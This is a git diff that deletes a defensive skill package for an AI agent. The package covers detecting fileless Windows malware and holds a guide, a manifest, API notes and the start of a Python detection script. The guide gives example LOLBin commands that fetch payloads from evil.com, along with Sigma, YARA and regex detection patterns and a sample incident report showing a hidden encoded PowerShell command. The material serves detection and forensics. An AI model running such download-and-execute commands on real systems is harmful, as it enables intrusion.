-      the copyright owner that is granting the License.
-
-      "Legal Entity" shall mean the union of the acting entity and all
-      other entities that control, are controlled by, or are under common
-      control with that entity. For the purposes of this definition,
-      "control" means (i) the power, direct or indirect, to cause the
-      direction or management of such entity, whether by contract or
-      otherwise, or (ii) ownership of fifty percent (50%) or more of the
-      outstanding shares, or (iii) beneficial ownership of such entity.
-
-      "You" (or "Your") shall mean an individual or Legal Entity
-      exercising permissions granted by this License.
-
-      "Source" form shall mean the preferred form for making modifications,
-      including but not limited to software source code, documentation
-      source, and configuration files.
-
-      "Object" form shall mean any form resulting from mechanical
-      transformation or translation of a Source form, including but
-      not limited to compiled object code, generated documentation,
-      and conversions to other media types.
-
-      "Work" shall mean the work of authorship, whether in Source or
-      Object form, made available under the License, as indicated by a
-      copyright notice that is included in or attached to the work
-      (an example is provided in the Appendix below).
-
-      "Derivative Works" shall mean any work, whether in Source or Object
-      form, that is based on (or derived from) the Work and for which the
-      editorial revisions, annotations, elaborations, or other modifications
-      represent, as a whole, an original work of authorship. For the purposes
-      of this License, Derivative Works shall not include works that remain
-      separable from, or merely link (or bind by name) to the interfaces of,
-      the Work and Derivative Works thereof.
-
-      "Contribution" shall mean any work of authorship, including
-      the original version of the Work and any modifications or additions
-      to that Work or Derivative Works thereof, that is intentionally
-      submitted to the Licensor for inclusion in the Work by the copyright owner
-      or by an individual or Legal Entity authorized to submit on behalf of
-      the copyright owner. For the purposes of this definition, "submitted"
-      means any form of electronic, verbal, or written communication sent
-      to the Licensor or its representatives, including but not limited to
-      communication on electronic mailing lists, source code control systems,
-      and issue tracking systems that are managed by, or on behalf of, the
-      Licensor for the purpose of discussing and improving the Work, but
-      excluding communication that is conspicuously marked or otherwise
-      designated in writing by the copyright owner as "Not a Contribution."
-
-      "Contributor" shall mean Licensor and any individual or Legal Entity
-      on behalf of whom a Contribution has been received by the Licensor and
-      subsequently incorporated within the Work.
-
-   2. Grant of Copyright License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      copyright license to reproduce, prepare Derivative Works of,
-      publicly display, publicly perform, sublicense, and distribute the
-      Work and such Derivative Works in Source or Object form.
-
-   3. Grant of Patent License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      (except as stated in this section) patent license to make, have made,
-      use, offer to sell, sell, import, and otherwise transfer the Work,
-      where such license applies only to those patent claims licensable
-      by such Contributor that are necessarily infringed by their
-      Contribution(s) alone or by combination of their Contribution(s)
-      with the Work to which such Contribution(s) was submitted. If You
-      institute patent litigation against any entity (including a
-      cross-claim or counterclaim in a lawsuit) alleging that the Work
-      or a Contribution incorporated within the Work constitutes direct
-      or contributory patent infringement, then any patent licenses
-      granted to You under this License for that Work shall terminate
-      as of the date such litigation is filed.
-
-   4. Redistribution. You may reproduce and distribute copies of the
-      Work or Derivative Works thereof in any medium, with or without
-      modifications, and in Source or Object form, provided that You
-      meet the following conditions:
-
-      (a) You must give any other recipients of the Work or
-          Derivative Works a copy of this License; and
-
-      (b) You must cause any modified files to carry prominent notices
-          stating that You changed the files; and
-
-      (c) You must retain, in the Source form of any Derivative Works
-          that You distribute, all copyright, patent, trademark, and
-          attribution notices from the Source form of the Work,
-          excluding those notices that do not pertain to any part of
-          the Derivative Works; and
-
-      (d) If the Work includes a "NOTICE" text file as part of its
-          distribution, then any Derivative Works that You distribute must
-          include a readable copy of the attribution notices contained
-          within such NOTICE file, excluding any notices that do not
-          pertain to any part of the Derivative Works, in at least one
-          of the following places: within a NOTICE text file distributed
-          as part of the Derivative Works; within the Source form or
-          documentation, if provided along with the Derivative Works; or,
-          within a display generated by the Derivative Works, if and
-          wherever such third-party notices normally appear. The contents
-          of the NOTICE file are for informational purposes only and
-          do not modify the License. You may add Your own attribution
-          notices within Derivative Works that You distribute, alongside
-          or as an addendum to the NOTICE text from the Work, provided
-          that such additional attribution notices cannot be construed
-          as modifying the License.
-
-      You may add Your own copyright statement to Your modifications and
-      may provide additional or different license terms and conditions
-      for use, reproduction, or distribution of Your modifications, or
-      for any such Derivative Works as a whole, provided Your use,
-      reproduction, and distribution of the Work otherwise complies with
-      the conditions stated in this License.
-
-   5. Submission of Contributions. Unless You explicitly state otherwise,
-      any Contribution intentionally submitted for inclusion in the Work
-      by You to the Licensor shall be under the terms and conditions of
-      this License, without any additional terms or conditions.
-      Notwithstanding the above, nothing herein shall supersede or modify
-      the terms of any separate license agreement you may have executed
-      with Licensor regarding such Contributions.
-
-   6. Trademarks. This License does not grant permission to use the trade
-      names, trademarks, service marks, or product names of the Licensor,
-      except as required for reasonable and customary use in describing the
-      origin of the Work and reproducing the content of the NOTICE file.
-
-   7. Disclaimer of Warranty. Unless required by applicable law or
-      agreed to in writing, Licensor provides the Work (and each
-      Contributor provides its Contributions) on an "AS IS" BASIS,
-      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
-      implied, including, without limitation, any warranties or conditions
-      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
-      PARTICULAR PURPOSE. You are solely responsible for determining the
-      appropriateness of using or redistributing the Work and assume any
-      risks associated with Your exercise of permissions under this License.
-
-   8. Limitation of Liability. In no event and under no legal theory,
-      whether in tort (including negligence), contract, or otherwise,
-      unless required by applicable law (such as deliberate and grossly
-      negligent acts) or agreed to in writing, shall any Contributor be
-      liable to You for damages, including any direct, indirect, special,
-      incidental, or consequential damages of any character arising as a
-      result of this License or out of the use or inability to use the
-      Work (including but not limited to damages for loss of goodwill,
-      work stoppage, computer failure or malfunction, or any and all
-      other commercial damages or losses), even if such Contributor
-      has been advised of the possibility of such damages.
-
-   9. Accepting Warranty or Additional Liability. While redistributing
-      the Work or Derivative Works thereof, You may choose to offer,
-      and charge a fee for, acceptance of support, warranty, indemnity,
-      or other liability obligations and/or rights consistent with this
-      License. However, in accepting such obligations, You may act only
-      on Your own behalf and on Your sole responsibility, not on behalf
-      of any other Contributor, and only if You agree to indemnify,
-      defend, and hold each Contributor harmless for any liability
-      incurred by, or claims asserted against, such Contributor by reason
-      of your accepting any such warranty or additional liability.
-
-   END OF TERMS AND CONDITIONS
-
-   APPENDIX: How to apply the Apache License to your work.
-
-      To apply the Apache License to your work, attach the following
-      boilerplate notice, with the fields enclosed by brackets "[]"
-      replaced with your own identifying information. (Don't include
-      the brackets!)  The text should be enclosed in the appropriate
-      comment syntax for the file format. Please do not remove or change
-      the license header comment from a contributed file except when
-      necessary.
-
-   Copyright 2026 mukul975
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/SKILL.md b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/SKILL.md
deleted file mode 100644
index 5ec83a611..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/SKILL.md
+++ /dev/null
@@ -1,424 +0,0 @@
----
-name: detecting-fileless-malware-techniques
-description: 'Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection,
-  registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk.
-  Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI
-  persistence examination.
-
-  '
-domain: cybersecurity
-subdomain: malware-analysis
-tags:
-- malware
-- fileless
-- LOLBins
-- memory-analysis
-- detection
-version: 1.0.0
-author: mahipal
-license: Apache-2.0
-d3fend_techniques:
-- Executable Denylisting
-- Execution Isolation
-- File Metadata Consistency Validation
-- Content Format Conversion
-- File Content Analysis
-nist_csf:
-- DE.AE-02
-- RS.AN-03
-- ID.RA-01
-- DE.CM-01
----
-
-# Detecting Fileless Malware Techniques
-
-## When to Use
-
-- EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32)
-- Investigating attacks that leave no traditional malware files on disk
-- Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence
-- Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments
-- Memory forensics reveals malicious code but no corresponding files exist on the filesystem
-
-**Do not use** for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware.
-
-## Prerequisites
-
-- Sysmon installed and configured with comprehensive logging (process creation, WMI events, registry changes)
-- PowerShell Script Block Logging and Module Logging enabled
-- Volatility 3 for memory forensics of fileless malware artifacts
-- Process Monitor (ProcMon) for real-time system activity monitoring
-- Windows Event Log access with adequate retention policies
-- Autoruns for identifying persistence mechanisms
-
-## Workflow
-
-### Step 1: Identify LOLBin Usage
-
-Detect abuse of legitimate Windows binaries for malicious purposes:
-
-```
-Commonly Abused LOLBins and Detection Patterns:
-━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
-mshta.exe:
-  Abuse: Execute HTA files with embedded VBScript/JScript
-  Example: mshta http://evil.com/payload.hta
-  Example: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -enc ...""")
-  Detect: mshta.exe with URL argument or vbscript: prefix
-
-regsvr32.exe:
-  Abuse: Load scriptlets via COM (.sct files) - "Squiblydoo"
-  Example: regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll
-  Detect: regsvr32.exe with /i: URL parameter
-
-certutil.exe:
-  Abuse: Download files, decode Base64
-  Example: certutil -urlcache -split -f http://evil.com/payload.exe
-  Example: certutil -decode encoded.txt payload.exe
-  Detect: certutil.exe with -urlcache or -decode arguments
-
-rundll32.exe:
-  Abuse: Execute DLL functions, JavaScript
-  Example: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";...
-  Detect: rundll32.exe with javascript: argument
-
-wmic.exe:
-  Abuse: Execute code via XSL stylesheets
-  Example: wmic process get brief /format:"http://evil.com/payload.xsl"
-  Detect: wmic.exe with /format: URL parameter
-
-bitsadmin.exe:
-  Abuse: Download files via BITS
-  Example: bitsadmin /transfer job http://evil.com/payload.exe C:\Temp\p.exe
-  Detect: bitsadmin.exe with /transfer or /addfile to external URL
-
-cmstp.exe:
-  Abuse: Execute commands via INF file
-  Example: cmstp.exe /ni /s payload.inf
-  Detect: cmstp.exe execution from non-standard locations
-```
-
-### Step 2: Detect WMI-Based Persistence
-
-Analyze WMI event subscriptions used for fileless persistence:
-
-```bash
-# List WMI event subscriptions (filters, consumers, bindings)
-wmic /namespace:"\\root\subscription" path __EventFilter get Name,Query /format:list
-wmic /namespace:"\\root\subscription" path CommandLineEventConsumer get Name,CommandLineTemplate /format:list
-wmic /namespace:"\\root\subscription" path ActiveScriptEventConsumer get Name,ScriptText /format:list
-wmic /namespace:"\\root\subscription" path __FilterToConsumerBinding get Filter,Consumer /format:list
-
-# PowerShell enumeration of WMI subscriptions
-Get-WMIObject -Namespace root\Subscription -Class __EventFilter
-Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer
-Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer
-Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
-```
-
-```python
-# Parse Sysmon WMI events (Event IDs 19, 20, 21)
-import subprocess
-import xml.etree.ElementTree as ET
-
-# WMI Event Filter creation (EID 19)
-result = subprocess.run(
-    ["wevtutil", "qe", "Microsoft-Windows-Sysmon/Operational",
-     "/q:*[System[EventID=19 or EventID=20 or EventID=21]]", "/f:xml", "/c:50"],
-    capture_output=True, text=True
-)
-
-ns = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
-for event_xml in result.stdout.split("</Event>"):
-    if not event_xml.strip():
-        continue
-    try:
-        root = ET.fromstring(event_xml + "</Event>")
-        eid = root.find(".//e:System/e:EventID", ns).text
-        data = {}
-        for d in root.findall(".//e:EventData/e:Data", ns):
-            data[d.get("Name")] = d.text
-
-        if eid == "19":
-            print(f"[!] WMI Filter Created: {data.get('Name')}")
-            print(f"    Query: {data.get('Query')}")
-        elif eid == "20":
-            print(f"[!] WMI Consumer Created: {data.get('Name')}")
-            print(f"    Type: {data.get('Type')}")
-            print(f"    Destination: {data.get('Destination')}")
-        elif eid == "21":
-            print(f"[!] WMI Binding Created")
-            print(f"    Consumer: {data.get('Consumer')}")
-            print(f"    Filter: {data.get('Filter')}")
-    except:
-        pass
-```
-
-### Step 3: Detect Registry-Resident Payloads
-
-Find malicious code stored in the Windows Registry:
-
-```bash
-# Common registry locations for fileless payloads
-reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s
-reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /s
-reg query "HKCU\Environment" /s
-
-# Check for PowerShell encoded commands in registry values
-# Malware stores Base64-encoded payloads in custom registry keys
-reg query "HKCU\Software" /s /f "powershell" 2>nul
-reg query "HKCU\Software" /s /f "-enc" 2>nul
-
-# Check for large registry values (possible stored payloads)
-python3 << 'PYEOF'
-import winreg
-import base64
-
-suspicious_keys = [
-    (winreg.HKEY_CURRENT_USER, r"Software"),
-    (winreg.HKEY_LOCAL_MACHINE, r"Software"),
-]
-
-def scan_registry(hive, path, depth=0):
-    if depth > 3:
-        return
-    try:
-        key = winreg.OpenKey(hive, path)
-        i = 0
-        while True:
-            try:
-                name, value, vtype = winreg.EnumValue(key, i)
-                if isinstance(value, str) and len(value) > 500:
-                    # Check for Base64-encoded content
-                    try:
-                        decoded = base64.b64decode(value[:100])
-                        print(f"[!] Large Base64 value: {path}\\{name} ({len(value)} bytes)")
-                    except:
-                        pass
-                    # Check for PowerShell keywords
-                    if any(kw in value.lower() for kw in ["powershell", "invoke", "iex", "-enc"]):
-                        print(f"[!] PowerShell in registry: {path}\\{name}")
-                i += 1
-            except WindowsError:
-                break
-        # Recurse into subkeys
-        j = 0
-        while True:
-            try:
-                subkey = winreg.EnumKey(key, j)
-                scan_registry(hive, f"{path}\\{subkey}", depth + 1)
-                j += 1
-            except WindowsError:
-                break
-    except:
-        pass
-
-for hive, path in suspicious_keys:
-    scan_registry(hive, path)
-PYEOF
-```
-
-### Step 4: Analyze Memory for Fileless Artifacts
-
-Use memory forensics to find in-memory-only malware:
-
-```bash
-# Process with injected code (no backing file)
-vol3 -f memory.dmp windows.malfind
-
-# Check for .NET assemblies loaded from memory (not from disk files)
-vol3 -f memory.dmp windows.vadinfo --pid 4012 | grep -i "PAGE_EXECUTE"
-
-# PowerShell CLR usage (indicates .NET reflection loading)
-vol3 -f memory.dmp windows.cmdline | grep -i "powershell"
-
-# Scan for known fileless frameworks
-vol3 -f memory.dmp yarascan.YaraScan --yara-rules "
-rule Fileless_PowerShell {
-    strings:
-        \$s1 = \"System.Reflection.Assembly\" ascii wide
-        \$s2 = \"[System.Convert]::FromBase64String\" ascii wide
-        \$s3 = \"Invoke-Expression\" ascii wide
-        \$s4 = \"DownloadString\" ascii wide
-    condition:
-        2 of them
-}
-"
-
-# Extract PowerShell command history from memory
-vol3 -f memory.dmp windows.cmdline
-strings memory.dmp | grep -i "invoke-\|iex \|downloadstring\|-encodedcommand"
-```
-
-### Step 5: Build Comprehensive Detection Rules
-
-Create detection content for fileless techniques:
-
-```yaml
-# Sigma rule: LOLBin execution with network activity
-title: Suspicious LOLBin Execution with Network Arguments
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_mshta:
-        Image|endswith: '\mshta.exe'
-        CommandLine|contains:
-            - 'http'
-            - 'vbscript:'
-            - 'javascript:'
-    selection_certutil:
-        Image|endswith: '\certutil.exe'
-        CommandLine|contains:
-            - '-urlcache'
-            - '-decode'
-    selection_regsvr32:
-        Image|endswith: '\regsvr32.exe'
-        CommandLine|contains: '/i:http'
-    selection_wmic:
-        Image|endswith: '\wmic.exe'
-        CommandLine|contains: '/format:http'
-    condition: selection_mshta or selection_certutil or selection_regsvr32 or selection_wmic
-level: high
-```
-
-```yaml
-# Sigma rule: WMI persistence creation
-title: WMI Event Subscription for Persistence
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID:
-            - 19  # WMI EventFilter
-            - 20  # WMI EventConsumer
-            - 21  # WMI FilterConsumerBinding
-    condition: selection
-level: medium
-```
-
-### Step 6: Document Fileless Attack Chain
-
-Map the complete fileless attack lifecycle:
-
-```
-Typical Fileless Attack Chain:
-━━━━━━━━━━━━━━━━━━━━━━━━━━━━
-Phase 1 - Initial Access:
-  Email -> Macro -> mshta.exe/PowerShell (LOLBin abuse)
-  OR Web exploit -> regsvr32/certutil (scriptlet download)
-
-Phase 2 - Execution:
-  PowerShell downloads and executes script in memory
-  .NET Assembly.Load() for reflective loading
-  WMI process creation for lateral movement
-
-Phase 3 - Persistence:
-  WMI event subscription (survives reboots)
-  Registry-stored encoded payload (loaded by Run key)
-  Scheduled task executing inline PowerShell
-
-Phase 4 - Privilege Escalation:
-  PowerShell with Invoke-Mimikatz (in-memory credential theft)
-  Named pipe impersonation via WMI
-
-Phase 5 - Lateral Movement:
-  WMI remote process creation (no file transfer needed)
-  PowerShell remoting (WinRM)
-  PsExec via WMI
-
-Phase 6 - Exfiltration:
-  PowerShell HTTP POST to C2
-  DNS tunneling via Invoke-DNSExfiltration
-  Cloud storage API (OneDrive, Google Drive)
-```
-
-## Key Concepts
-
-| Term | Definition |
-|------|------------|
-| **Fileless Malware** | Malware operating entirely in memory or within legitimate system tools without creating traditional executable files on disk |
-| **LOLBins (Living Off the Land Binaries)** | Legitimate system binaries (mshta, regsvr32, certutil) abused by attackers to execute malicious code while evading application whitelisting |
-| **WMI Event Subscription** | Windows Management Instrumentation persistence mechanism using event filters, consumers, and bindings to execute code on system events |
-| **Registry-Resident Payload** | Malicious code stored as encoded data in Windows Registry values, loaded and executed by a small stub in a Run key |
-| **Reflective Loading** | Loading .NET assemblies or PE files from byte arrays in memory using Assembly.Load() without writing to disk |
-| **In-Memory Execution** | Running code directly in RAM without creating files, leveraging process injection, reflective loading, or script interpreters |
-| **Script Block Logging** | Windows PowerShell logging feature (Event ID 4104) that captures script content after deobfuscation, essential for fileless threat visibility |
-
-## Tools & Systems
-
-- **Sysmon**: System Monitor providing detailed event logging for process creation, WMI events, registry changes, and network connections
-- **Autoruns**: Sysinternals tool showing all auto-start locations including WMI subscriptions, scheduled tasks, and registry entries
-- **Volatility**: Memory forensics framework for detecting in-memory code, injected processes, and fileless malware artifacts
-- **Process Monitor**: Real-time monitoring of file system, registry, and process activity for observing fileless attack behavior
-- **LOLBAS Project**: Community-documented catalog of LOLBin abuse techniques at https://lolbas-project.github.io/
-
-## Common Scenarios
-
-### Scenario: Investigating a Fileless Attack Using WMI Persistence
-
-**Context**: Sysmon alerts show WMI event subscription creation followed by periodic PowerShell execution without any corresponding malware files on disk. The attack persists across reboots.
-
-**Approach**:
-1. Query WMI namespace for event filters, consumers, and bindings to identify the persistence mechanism
-2. Extract the CommandLineEventConsumer or ActiveScriptEventConsumer payload
-3. Decode the PowerShell command (typically Base64-encoded with -enc flag)
-4. Trace the PowerShell execution in Script Block Logging (Event ID 4104) for the full deobfuscated payload
-5. Analyze memory dump for reflectively loaded assemblies and injected code
-6. Check registry for additional stored payloads referenced by the PowerShell script
-7. Map the complete attack chain from initial access through persistence and lateral movement
-
-**Pitfalls**:
-- Not having Sysmon WMI event logging enabled (Events 19/20/21) before the incident
-- Rebooting the system before capturing a memory dump (destroys in-memory evidence)
-- Focusing only on file-based IOCs when the attack is entirely fileless
-- Missing the initial access vector because the LOLBin execution left minimal traces
-
-## Output Format
-
-```
-FILELESS MALWARE ANALYSIS REPORT
-===================================
-Incident:         INC-2025-2847
-Attack Type:      Fileless (no malware files on disk)
-
-INITIAL ACCESS
-Vector:           Phishing email with macro-enabled document
-LOLBin Chain:     WINWORD.EXE -> mshta.exe -> powershell.exe
-
-PERSISTENCE MECHANISM
-Type:             WMI Event Subscription
-Filter Name:      WindowsUpdateCheck
-Filter Query:     SELECT * FROM __InstanceModificationEvent WITHIN 300
-                  WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
-Consumer:         CommandLineEventConsumer
-Command:          powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...
-
-DECODED PAYLOAD
-[Layer 1] Base64 UTF-16LE decode
-[Layer 2] AMSI bypass + Assembly.Load() of embedded .NET payload
-[Layer 3] .NET RAT with C2 communication to 185.220.101[.]42
-
-REGISTRY PAYLOADS
-HKCU\Software\AppDataLow\Config\data = [Base64 encoded .NET assembly, 247KB]
-Loaded by: PowerShell WMI consumer script
-
-MEMORY ARTIFACTS
-PID 4012 (powershell.exe): Injected .NET assembly at 0x00400000
-  - CobaltStrike beacon detected via YARA
-  - C2: hxxps://185.220.101[.]42/updates
-
-EXTRACTED IOCs
-C2 IP:            185.220.101[.]42
-WMI Filter:       WindowsUpdateCheck
-Registry Path:    HKCU\Software\AppDataLow\Config\data
-PowerShell Flags: -nop -w hidden -enc
-
-MITRE ATT&CK
-T1059.001  PowerShell
-T1546.003  WMI Event Subscription
-T1218.005  Mshta
-T1112      Modify Registry
-T1055.012  Process Hollowing
-```
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/manifest.json b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/manifest.json
deleted file mode 100644
index 3658ad9e5..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/manifest.json
+++ /dev/null
@@ -1,63 +0,0 @@
-{
-  "schemaVersion": "hub.plugin.v1",
-  "id": "detecting-fileless-malware-techniques",
-  "type": "skill",
-  "name": "detecting-fileless-malware-techniques",
-  "description": "Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.",
-  "version": "1.0.0",
-  "author": "mahipal",
-  "license": "Apache-2.0",
-  "homepage": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills",
-  "category": "detection",
-  "tags": [
-    "windows"
-  ],
-  "useCases": [
-    "endpoint-forensics"
-  ],
-  "domains": [
-    "security-ops"
-  ],
-  "capabilities": [
-    "llm-agent",
-    "file-analysis"
-  ],
-  "trust": "community",
-  "source": {
-    "kind": "bundled",
-    "path": ".flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques"
-  },
-  "compatibility": {
-    "flocks": ">=0.8.0",
-    "os": [
-      "darwin",
-      "linux",
-      "windows"
-    ]
-  },
-  "dependencies": {
-    "skills": [],
-    "tools": [],
-    "python": [],
-    "external": []
-  },
-  "permissions": {
-    "tools": [],
-    "network": false,
-    "shell": false,
-    "filesystem": "read"
-  },
-  "risk": {
-    "level": "low",
-    "reasons": []
-  },
-  "entrypoints": [
-    "SKILL.md"
-  ],
-  "checksums": {},
-  "upstream": {
-    "name": "mukul975/Anthropic-Cybersecurity-Skills",
-    "url": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
-  },
-  "sourceNotice": "Source: This skill is adapted from the open-source project https://github.com/mukul975/Anthropic-Cybersecurity-Skills."
-}
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/references/api-reference.md b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/references/api-reference.md
deleted file mode 100644
index 02a216a27..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/references/api-reference.md
+++ /dev/null
@@ -1,81 +0,0 @@
-# Fileless Malware Detection API Reference
-
-## Windows Event IDs for Fileless Detection
-
-| Event ID | Log | Description |
-|----------|-----|-------------|
-| 4104 | PowerShell Operational | Script Block Logging (full script content) |
-| 4103 | PowerShell Operational | Module Logging |
-| 1 | Sysmon | Process Creation with command line |
-| 8 | Sysmon | CreateRemoteThread (injection) |
-| 10 | Sysmon | ProcessAccess (injection prep) |
-| 19/20/21 | Sysmon | WMI Event Filter/Consumer/Binding |
-| 7045 | System | New service installed |
-
-## python-evtx - Parse Windows Event Logs
-
-```python
-import Evtx.Evtx as evtx
-
-with evtx.Evtx("Security.evtx") as log:
-    for record in log.records():
-        xml = record.xml()
-        if "<EventID>4104</EventID>" in xml:
-            print(record.timestamp(), xml[:500])
-```
-
-## Volatility 3 Commands
-
-```bash
-# Detect injected code (RWX memory, PE headers in non-image VADs)
-vol3 -f memory.dmp windows.malfind
-
-# List processes
-vol3 -f memory.dmp windows.pslist
-
-# Scan for hidden processes
-vol3 -f memory.dmp windows.psscan
-
-# List loaded DLLs
-vol3 -f memory.dmp windows.dlllist --pid 1234
-
-# Extract injected code
-vol3 -f memory.dmp windows.malfind --dump --pid 1234
-```
-
-## LOLBins Detection Patterns (Sysmon)
-
-```xml
-<!-- Sysmon config for LOLBin monitoring -->
-<RuleGroup groupRelation="or">
-  <ProcessCreate onmatch="include">
-    <Image condition="end with">mshta.exe</Image>
-    <Image condition="end with">regsvr32.exe</Image>
-    <Image condition="end with">certutil.exe</Image>
-    <Image condition="end with">wmic.exe</Image>
-    <Image condition="end with">cmstp.exe</Image>
-    <Image condition="end with">msbuild.exe</Image>
-  </ProcessCreate>
-</RuleGroup>
-```
-
-## Suspicious PowerShell Indicators
-
-```
--enc / -EncodedCommand    → Base64-encoded command
-IEX / Invoke-Expression   → Dynamic code execution
-Net.WebClient             → Download cradle
-DownloadString()          → Remote script fetch
-Reflection.Assembly       → Reflective .NET loading
-VirtualAlloc              → Shellcode allocation
-FromBase64String          → Payload decoding
-```
-
-## WMI Persistence Check
-
-```powershell
-# List WMI event subscriptions
-Get-WMIObject -Namespace root\Subscription -Class __EventFilter
-Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
-Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
-```
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/scripts/agent.py b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/scripts/agent.py
deleted file mode 100644
index 7a534f8d4..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/scripts/agent.py
+++ /dev/null
@@ -1,205 +0,0 @@
-#!/usr/bin/env python3
-"""Fileless malware detection agent using Windows event logs and Volatility."""
-
-import json
-import os
-import re
-import subprocess
-import sys
-from datetime import datetime
-
-try:
-    import Evtx.Evtx as evtx
-    HAS_EVTX = True
-except ImportError:
-    HAS_EVTX = False
-
-
-LOLBINS = {
-    "mshta.exe": {"risk": "HIGH", "usage": "Execute HTA with embedded VBScript/JScript"},
-    "regsvr32.exe": {"risk": "HIGH", "usage": "Proxy execution via COM scriptlets"},
-    "rundll32.exe": {"risk": "HIGH", "usage": "Execute DLL exports or JavaScript"},
-    "certutil.exe": {"risk": "HIGH", "usage": "Download files, decode base64 payloads"},
-    "bitsadmin.exe": {"risk": "MEDIUM", "usage": "Download files via BITS service"},
-    "wmic.exe": {"risk": "HIGH", "usage": "Remote execution, XSL script processing"},
-    "cmstp.exe": {"risk": "HIGH", "usage": "UAC bypass, COM object registration"},
-    "msbuild.exe": {"risk": "HIGH", "usage": "Execute inline C# tasks from XML"},
-    "installutil.exe": {"risk": "MEDIUM", "usage": "Execute .NET assemblies"},
-    "regasm.exe": {"risk": "MEDIUM", "usage": "Execute .NET COM assemblies"},
-    "powershell.exe": {"risk": "CONTEXT", "usage": "Script execution, download cradle"},
-    "cmd.exe": {"risk": "CONTEXT", "usage": "Command execution, script chaining"},
-    "wscript.exe": {"risk": "MEDIUM", "usage": "Execute VBScript/JScript files"},
-    "cscript.exe": {"risk": "MEDIUM", "usage": "Execute VBScript/JScript files"},
-}
-
-SUSPICIOUS_PS_PATTERNS = [
-    (r'-enc\s', "Encoded command execution"),
-    (r'IEX\s*\(', "Invoke-Expression (download cradle)"),
-    (r'Invoke-Expression', "Invoke-Expression"),
-    (r'Net\.WebClient', "WebClient download"),
-    (r'DownloadString\(', "Remote script download"),
-    (r'DownloadFile\(', "File download"),
-    (r'FromBase64String', "Base64 decoding"),
-    (r'Reflection\.Assembly', ".NET reflection loading"),
-    (r'\[System\.Convert\]', "Type conversion (possible decode)"),
-    (r'New-Object\s+IO\.MemoryStream', "In-memory stream (reflective load)"),
-    (r'VirtualAlloc', "Memory allocation (shellcode)"),
-    (r'CreateThread', "Thread creation (injection)"),
-    (r'Add-MpPreference.*ExclusionPath', "Defender exclusion modification"),
-    (r'Set-MpPreference.*DisableRealtimeMonitoring', "Defender disablement"),
-]
-
-
-def scan_powershell_logs(log_dir=None):
-    """Scan PowerShell script block logs for suspicious patterns."""
-    if not log_dir:
-        log_dir = r"C:\Windows\System32\winevt\Logs"
-
-    ps_log = os.path.join(log_dir, "Microsoft-Windows-PowerShell%4Operational.evtx")
-    if not os.path.exists(ps_log) or not HAS_EVTX:
-        return {"error": "PowerShell log not found or python-evtx not installed"}
-
-    alerts = []
-    with evtx.Evtx(ps_log) as log:
-        for record in log.records():
-            try:
-                xml = record.xml()
-                if "<EventID>4104</EventID>" not in xml:
-                    continue
